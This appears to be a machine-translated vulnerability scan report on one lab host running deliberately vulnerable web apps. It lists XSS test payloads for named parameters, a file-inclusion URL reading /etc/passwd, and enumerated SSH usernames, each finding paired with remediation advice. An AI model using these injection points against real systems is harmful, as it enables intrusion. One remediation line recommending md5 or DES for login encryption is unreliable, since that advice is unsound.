http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >fiZg(7466)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Cshr(9544)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >oKNc(1521)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >LbjE(6838)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >VNjr(5537)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Tcmc(3742)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev=1.12 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >vOsR(3419)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >IMdT(3879)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore&param1=1.13&param2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >BdYH(6576)</ScRiPt> |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Reflected_DOM_Injection |
1. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
2. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
3. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
4. You can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
UnrealIRCd is installed on this host and is prone to an authentication spoofing vulnerability. Successful exploitation of this vulnerability allows remote attackers to spoof certificate fingerprints and consequently log in as another user. Impact Level: Application.
CVE: [*]
CVSS Score: 6.8
Node(s) | Additional Information |
---|---|
192.168.105.200:6667 | Target: IP: 192.168.105.200 Port: 6667, UnrealIRCd is installed on this host and is prone to an authentication spoofing vulnerability. Successful exploitation of this vulnerability allows remote attackers to spoof certificate fingerprints and consequently log in as another user. Impact Level: Application. |
# | Reference |
---|---|
1 | http://seclists.org/oss-sec/2016/q3/420 |
2 | http://www.openwall.com/lists/oss-security/2016/09/05/8 |
3 | https://github.com/unrealircd/unrealircd/commit/f473e355e1dc422c4f019dbf86bc50ba1a34a766 |
Upgrade to UnrealIRCd 3.2.10.7, or 4.0.6, or later. For updates refer to https://bugs.unrealircd.org/main_page.php
Successfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. OpenSSL is prone to a security-bypass vulnerability.
CVE: [*]
CVSS Score: 6.8
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, Successfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. OpenSSL is prone to a security-bypass vulnerability. |
# | Reference |
---|---|
1 | http://www.securityfocus.com/bid/67899 |
2 | http://openssl.org/ |
Updates are available.
Leakage Background Logon Entry
CVE: [*]
CVSS Score: 6.6
Node(s) | Additional Information |
---|---|
http://192.168.105.200/phpMyAdmin/index.php?lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f | Target: http://192.168.105.200/phpMyAdmin/index.php?lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/ChangeLog | Target: http://192.168.105.200/phpMyAdmin/ChangeLog has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/index.php?token=3fe9a890c05f09edeb1cbf73cb091acd | Target: http://192.168.105.200/phpMyAdmin/index.php?token=3fe9a890c05f09edeb1cbf73cb091acd has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/index.php | Target: http://192.168.105.200/phpMyAdmin/index.php has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/index.php?db=redefine+viral+convergence&table=Minnesota&token=3fe9a890c05f09edeb1cbf73cb091acd | Target: http://192.168.105.200/phpMyAdmin/index.php?db=redefine+viral+convergence&table=Minnesota&token=3fe9a890c05f09edeb1cbf73cb091acd has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/ | Target: http://192.168.105.200/phpMyAdmin/ has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/index.php?pma_username=1&pma_password=1&server=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post | Target: http://192.168.105.200/phpMyAdmin/index.php?pma_username=1&pma_password=1&server=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/index.php?db=1&table=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post | Target: http://192.168.105.200/phpMyAdmin/index.php?db=1&table=1&lang=en-utf-8&convcharset=utf-8&token=e4dee536a37db094620f4815536a085f&method=post has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
http://192.168.105.200/phpMyAdmin/index.php?c=index | Target: http://192.168.105.200/phpMyAdmin/index.php?c=index has a background address leak vulnerability; check the background entry of the target application. Administrator applications are generally used for background management of websites, with full authority. These applications may contain sensitive information or have low security protection. An attacker can obtain sensitive information through this file or enter the background of a website for malicious operations. |
# | Reference |
---|---|
N/A |
1. Strengthen authentication and access security for such files.
2. If you do not need such a file, delete it.
3. Rename such files to unpredictable file names.
Based on the files accessible via this anonymous FTP login and the permissions of this account, an attacker might be able to gain access to sensitive files, or upload or delete files. This FTP server allows anonymous logins.
CVE: [*]
CVSS Score: 6.4
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Target: IP: 192.168.105.200 Port: 21, Based on the files accessible via this anonymous FTP login and the permissions of this account, an attacker might be able to gain access to sensitive files, or upload or delete files. This FTP server allows anonymous logins. |
# | Reference |
---|---|
1 | https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0497 |
If you do not want to share files, you should disable anonymous logins.
Samba is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application.
CVE: [*]
CVSS Score: 6.0
Node(s) | Additional Information |
---|---|
192.168.105.200:445 | Target: IP: 192.168.105.200 Port: 445, Samba is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application. |
# | Reference |
---|---|
1 | http://www.securityfocus.com/bid/23972 |
2 | https://www.samba.org/samba/security/CVE-2007-2447.html |
Updates are available. Please see the referenced vendor advisory.
Debugging functions are enabled on the remote HTTP server. The remote web server supports the TRACE and/or TRACK methods. TRACE and TRACK are HTTP methods which are used to debug web server connections. It has been shown that servers supporting these methods are subject to cross-site-scripting attacks, dubbed XST for Cross-Site-Tracing, when used in conjunction with various weaknesses in browsers. An attacker may use this flaw to trick your legitimate web users into giving him their credentials.
CVE: [*]
CVSS Score: 5.8
Node(s) | Additional Information |
---|---|
http://192.168.105.200 | Target: http://192.168.105.200, Debugging functions are enabled on the remote HTTP server. The remote web server supports the TRACE and/or TRACK methods. TRACE and TRACK are HTTP methods which are used to debug web server connections. It has been shown that servers supporting these methods are subject to cross-site-scripting attacks, dubbed XST for Cross-Site-Tracing, when used in conjunction with various weaknesses in browsers. An attacker may use this flaw to trick your legitimate web users into giving him their credentials. |
# | Reference |
---|---|
1 | http://www.kb.cert.org/vuls/id/867593 |
Disable these methods.
Leak sensitive information
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.phpDATA | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.phpDATA Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jspx | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.aspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.aspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.jspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/index.php?page=add-to-your-blog.php | Target: http://192.168.105.200/mutillidae/index.php?page=add-to-your-blog.php There is an exception information leaking from web services. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.htaccess | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.htaccess Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.htaccess | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.htaccess Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqKjsp | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqKjsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200/mutillidae/index.php?page=captured-data.php There is an exception information leaking from web services. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jsp | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.jsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.phpDATA | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.phpDATA Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.asp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZP.asp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.htaccess | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.htaccess Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZPjsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VokjZPjsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphDjsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphDjsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.aspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.aspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/phpinfo.php | Target: http://192.168.105.200/mutillidae/phpinfo.php Leakage PHP file exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jsp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jsp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/phpinfo.php | Target: http://192.168.105.200/phpinfo.php Leakage PHP file exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.aspx | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.aspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.asp | Target: http://192.168.105.200/twiki/pub/TWiki/WebPreferences/VAwyqK.asp Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jspx | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.jspx Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.phpDATA | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.phpDATA Leakage source exists. With this information, an attacker can further invade the server. |
http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.asp | Target: http://192.168.105.200/twiki/pub/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH/VPJphD.asp Leakage source exists. With this information, an attacker can further invade the server. |
# | Reference |
---|---|
N/A |
1. It is recommended that you delete useless programs such as probes or create hard-to-crack names for them. 2. Disable pages or applications that leak sensitive information.
Before OpenSSH 7.7, there was a user name enumeration vulnerability through which an attacker could determine whether a user name existed in the target host.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: 192.168.105.200:22, there is an OpenSSH user enumeration vulnerability (CVE-2018-15473). The users found to exist in the test are: root, nobody, mysql, bin, mail |
# | Reference |
---|---|
1 | http://openwall.com/lists/oss-security/2018/08/15/5 |
Upgrade OpenSSH to a version greater than 7.7.
Catalog Information Leakage
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/dav/ | Target: http://192.168.105.200/dav/ There is a directory information leak vulnerability. Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/javascript/ddsmoothmenu/ | Target: http://192.168.105.200/mutillidae/javascript/ddsmoothmenu/ There is a directory information leak vulnerability. Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server. |
http://192.168.105.200/dvwa/config | Target: http://192.168.105.200/dvwa/config There is a directory information leak vulnerability. Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server. |
http://192.168.105.200/mutillidae/javascript/ | Target: http://192.168.105.200/mutillidae/javascript/ There is a directory information leak vulnerability. Information leakage refers to the leakage of sensitive catalog information in web pages or applications. With this information, an attacker can further invade the server. |
# | Reference |
---|---|
N/A |
1. It is recommended that you delete useless programs such as probes or create hard-to-crack names for them. 2. Disable pages or applications that leak sensitive information.
Login data is not encrypted: it is transmitted over HTTP in plaintext, so the user's password is leaked if the traffic is hijacked by a malicious user during transmission.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/dvwa/login.php | Target: http://192.168.105.200/dvwa/login.php, HTTP account password plaintext transmission vulnerability |
# | Reference |
---|---|
N/A |
1. Use an encryption algorithm to encrypt the data during transmission (example: md5, DES, etc.)
This routine searches for weak SSL ciphers offered by a service.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, This routine searches for weak SSL ciphers offered by a service. |
# | Reference |
---|---|
1 | https://www.bsi.bund.de/SharedDocs/Warnmeldungen/DE/CB/warnmeldung_cb-k16-1465_update_6.html |
2 | https://bettercrypto.org/ |
The configuration of this service should be changed so that it no longer supports the listed weak ciphers.
The remote server's SSL certificate has already expired.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432, The remote server's SSL certificate has already expired. |
# | Reference |
---|---|
N/A |
Replace the SSL certificate with a new one.
The /doc directory is browsable. /doc shows the content of the /usr/doc directory and therefore it shows which programs and - important! - the version of the installed programs.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
http://192.168.105.200/doc/ | Target: http://192.168.105.200/doc/, The /doc directory is browsable. /doc shows the content of the /usr/doc directory and therefore it shows which programs and - important! - the version of the installed programs. |
# | Reference |
---|---|
N/A |
Use access restrictions for the /doc directory. If you use Apache you might use this in your access.conf:

```apache
<Directory /usr/doc>
    AllowOverride None
    order deny,allow
    deny from all
    allow from localhost
</Directory>
```

awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. awiki 20100125 is vulnerable; other versions may also be affected.
CVE: [*]
CVSS Score: 5.0
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/index.php?page=/etc/passwd | Target: http://192.168.105.200/mutillidae/index.php?page=/etc/passwd, awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. awiki 20100125 is vulnerable; other versions may also be affected. |
# | Reference |
---|---|
1 | http://www.securityfocus.com/bid/49187 |
2 | http://www.kobaonline.com/awiki/ |
The host / application transmits sensitive information (usernames, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Affected: hosts / applications which don't enforce the transmission of sensitive data via an encrypted SSL/TLS connection.
CVE: [*]
CVSS Score: 4.8
Node(s) | Additional Information |
---|---|
http://192.168.105.200/tikiwiki/tiki-install.php:pass | Target: http://192.168.105.200/tikiwiki/tiki-install.php:pass, The host / application transmits sensitive information (usernames, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Affected: hosts / applications which don't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. |
http://192.168.105.200/phpMyAdmin/:pma_password | Target: http://192.168.105.200/phpMyAdmin/:pma_password, The host / application transmits sensitive information (usernames, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Affected: hosts / applications which don't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. |
http://192.168.105.200/phpMyAdmin/?D=A:pma_password | Target: http://192.168.105.200/phpMyAdmin/?D=A:pma_password, The host / application transmits sensitive information (usernames, passwords) in cleartext via HTTP. An attacker could use this situation to compromise or eavesdrop on the HTTP communication between the client and the server using a man-in-the-middle attack to get access to sensitive data like usernames or passwords. Affected: hosts / applications which don't enforce the transmission of sensitive data via an encrypted SSL/TLS connection. |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management |
2 | https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure |
3 | https://cwe.mitre.org/data/definitions/319.html |
Enforce the transmission of sensitive data via an encrypted SSL/TLS connection. Additionally, make sure the host / application redirects all users to the secured SSL/TLS connection before allowing them to input sensitive data into the mentioned functions.
URL jump (redirection) is usually implemented in one of several ways: meta tag jump, JavaScript jump, or header jump. In any of these, if the server does not effectively check the incoming jump URL variable, an attacker can use this vulnerability to construct any malicious address, induce the victim to jump to a malicious website, and then launch Trojan horse, phishing and other attacks. In addition, URL jump vulnerabilities can be used to break through some common whitelist-based security restrictions, such as the URL transmission security checks in traditional IM: domain names and URLs of large companies are directly allowed to pass and are displayed as trusted URLs, so once such a URL contains a jump vulnerability, the security restrictions may be bypassed.
CVE: [*]
CVSS Score: 4.3
# | Reference |
---|---|
N/A |
1. If the jump URL can be determined beforehand, including the value of the URL and its parameters, it can be configured in the background. The URL parameter then only needs to pass the index of the corresponding URL, which is used to find the specific URL to jump to; 2. If the jump URL is not known beforehand, but the input is generated by the background (not passed in by the user as a parameter), then you can sign the jump link, and the signature must be verified first in order to make the jump; 3. If neither 1 nor 2 is satisfied, so that the URL cannot be determined beforehand and can only be passed in through front-end parameters, then the URL must be checked against the rules at the time of the jump: that is, whether the URL is in the authorized whitelist or is a regular URL; 4. In essence, the URL jump vulnerability is a special case of the CSRF vulnerability, so it can be verified by adding a token, by adding uncontrollable token pairs to the generated links. The generated links can be checked to avoid users from generating thei
The remote SSH server is configured to allow weak encryption algorithms.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: IP: 192.168.105.200 Port: 22, The remote SSH server is configured to allow weak encryption algorithms. |
# | Reference |
---|---|
1 | https://tools.ietf.org/html/rfc4253#section-6.3 |
2 | https://www.kb.cert.org/vuls/id/958563 |
Disable the weak encryption algorithms.
CSRF (Cross-Site Request Forgery), also known as a "One Click Attack" or Session Riding and usually abbreviated as CSRF or XSRF, is a malicious use of websites. Although it sounds like cross-site scripting (XSS), it is very different from XSS: XSS uses trusted users within the site, while CSRF uses trusted sites by disguising requests as coming from trusted users. Compared with XSS attacks, CSRF attacks are often less prevalent (and therefore the resources to guard against them are relatively scarce) and difficult to guard against, so they are considered to be more dangerous than XSS attacks.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG |
http://192.168.105.200/twiki/bin/edit/Sandbox/WebHome?t=1595894673 | Target:http://192.168.105.200/twiki/bin/edit/Sandbox/WebHome?t=1595894673 |
http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules | Target:http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE |
http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?t=1595894679 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?t=1595894679 |
http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK |
http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle | Target:http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle |
http://192.168.105.200/twiki/bin/edit/TWiki/success?t=1595894956 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/success?t=1595894956 |
http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894865 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894865 |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894669 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894669 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye?t=1595894868 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye?t=1595894868 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894869 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894869 |
http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?t=1595894745 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?t=1595894745 |
http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894694 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894694 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye |
